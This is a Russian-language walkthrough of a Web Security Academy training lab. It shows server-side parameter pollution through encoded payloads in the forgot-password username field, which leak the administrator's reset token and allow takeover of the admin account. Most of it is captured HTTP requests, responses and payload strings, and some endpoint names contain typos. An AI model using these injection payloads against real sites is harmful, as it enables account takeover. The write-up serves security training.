С помощью Server-side parameter pollution нужно залогиниться под учеткой administrator и удалить пользователя carlos.
https://0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net/
Solution
Попробую зайти с обычными кредами от лаб wiener:peter. Не вышло, но я получил POST запрос:
POST /login HTTP/2
Host: 0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net
Cookie: session=W14DyFQVdBTsig2ct12L52nNaaalfYUb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=DqlBaTLBXbtnWFO8OYhMap5ALQBgbDmt&username=wiener&password=peter
Так же я нашел форму для восстановления пароля:
POST /forgot-password HTTP/2
Host: 0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net
Cookie: session=W14DyFQVdBTsig2ct12L52nNaaalfYUb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net/forgot-password
Content-Type: x-www-form-urlencoded
Content-Length: 60
Origin: https://0ac00028049cf23b82c9e4c800b900fa.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
csrf=DqlBaTLBXbtnWFO8OYhMap5ALQBgbDmt&username=administrator
Со следующим ответом:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49
{"type":"email","result":"*****@normal-user.net"}
Так, значит есть параметр email. Оп, нашел еще запрос к js файлу: GET /static/js/forgotPassword.js. Он имеет следующее содержимое:
let forgotPwdReady = (callback) => {
if (document.readyState !== "loading") callback();
else document.addEventListener("DOMContentLoaded", callback);
}
function urlencodeFormData(fd){
let s = '';
function encode(s){ return encodeURIComponent(s).replace(/%20/g,'+'); }
for(let pair of fd.entries()){
if(typeof pair[1]=='string'){
s += (s?'&':'') + encode(pair[0])+'='+encode(pair[1]);
}
}
return s;
}
const validateInputsAndCreateMsg = () => {
try {
const forgotPasswordError = document.getElementById("forgot-password-error");
forgotPasswordError.textContent = "";
const forgotPasswordForm = document.getElementById("forgot-password-form");
const usernameInput = document.getElementsByName("username").item(0);
if (usernameInput && !usernameInput.checkValidity()) {
usernameInput.reportValidity();
return;
}
const formData = new FormData(forgotPasswordForm);
const config = {
method: "POST",
headers: {
"Content-Type": "x-www-form-urlencoded",
},
body: urlencodeFormData(formData)
};
fetch(window.location.pathname, config)
.then(response => response.json())
.then(jsonResponse => {
if (!jsonResponse.hasOwnProperty("result"))
{
forgotPasswordError.textContent = "Invalid username";
}
else
{
forgotPasswordError.textContent = `Please check your email: "${jsonResponse.result}"`;
forgotPasswordForm.className = "";
forgotPasswordForm.style.display = "none";
}
})
.catch(err => {
forgotPasswordError.textContent = "Invalid username";
});
} catch (error) {
console.error("Unexpected Error:", error);
}
}
const displayMsg = (e) => {
e.preventDefault();
validateInputsAndCreateMsg(e);
};
forgotPwdReady(() => {
const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
const resetToken = urlParams.get('reset-token');
if (resetToken)
{
window.location.href = `/forgot-password?reset_token=${resetToken}`;
}
else
{
const forgotPasswordBtn = document.getElementById("forgot-password-btn");
forgotPasswordBtn.addEventListener("click", displayMsg);
}
});
Попробую поэксперементировать с запросом /forgot-login. Смогу ли я добавить второй параметр к запросу с помощью &:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 40
{"error": "Parameter is not supported."}
Значит & можно использовать, чтобы добавить второй аргумент в запрос. Попробую символ # для разделения запроса administrator%23foo:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 33
{"error": "Field not specified."}
Из этого можно сделать вывод, что запрос разделился. И для его валидации не хватает заполненного поля field. Пробую следующий пейлоад:
administrator%26field=a%23
Ответ:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 58
{"type":"ClientError","code":400,"error":"Invalid field."}
Запрос сработал, но нужно правильно подобрать значение для field. Ранее я находил поле email. Попробую подставить его:
administrator%26field=email%23
Получилось.
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49
{"type":"email","result":"*****@normal-user.net"}
А что, если вместо email подставить username?
administrator%26field=username%23
Это сработало:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 44
{"type":"username","result":"administrator"}
Попробую получить пароль:
administrator%26field=password%23
Не получилось(
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 44
{"type":"username","result":"administrator"}
Поищу, какие поля еще можно вытащить. В файле forgotPassword.js был следующий код:
forgotPwdReady(() => {
const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
const resetToken = urlParams.get('reset-token');
if (resetToken)
{
window.location.href = `/forgot-password?reset_token=${resetToken}`;
}
else
{
const forgotPasswordBtn = document.getElementById("forgot-password-btn");
forgotPasswordBtn.addEventListener("click", displayMsg);
}
});
Тут есть поле reset_token. Попробую получить его:
administrator%26field=reset_token%23
Ответ:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 66
{"type":"reset_token","result":"a6nqnhzezonshv4qgkuffjh0l61zru51"}
Токен получен. Теперь перейду по ссылке /fogot-password?reset_token=a6nqnhzezonshv4qgkuffjh0l61zru51 для сброса пароля админа.
Задам невероятно секурный пароль(нет). Попробую залогиниться:
Зайду в админ панель и нажму кнопочку:
Пользователь удален, а значит лаба решена:
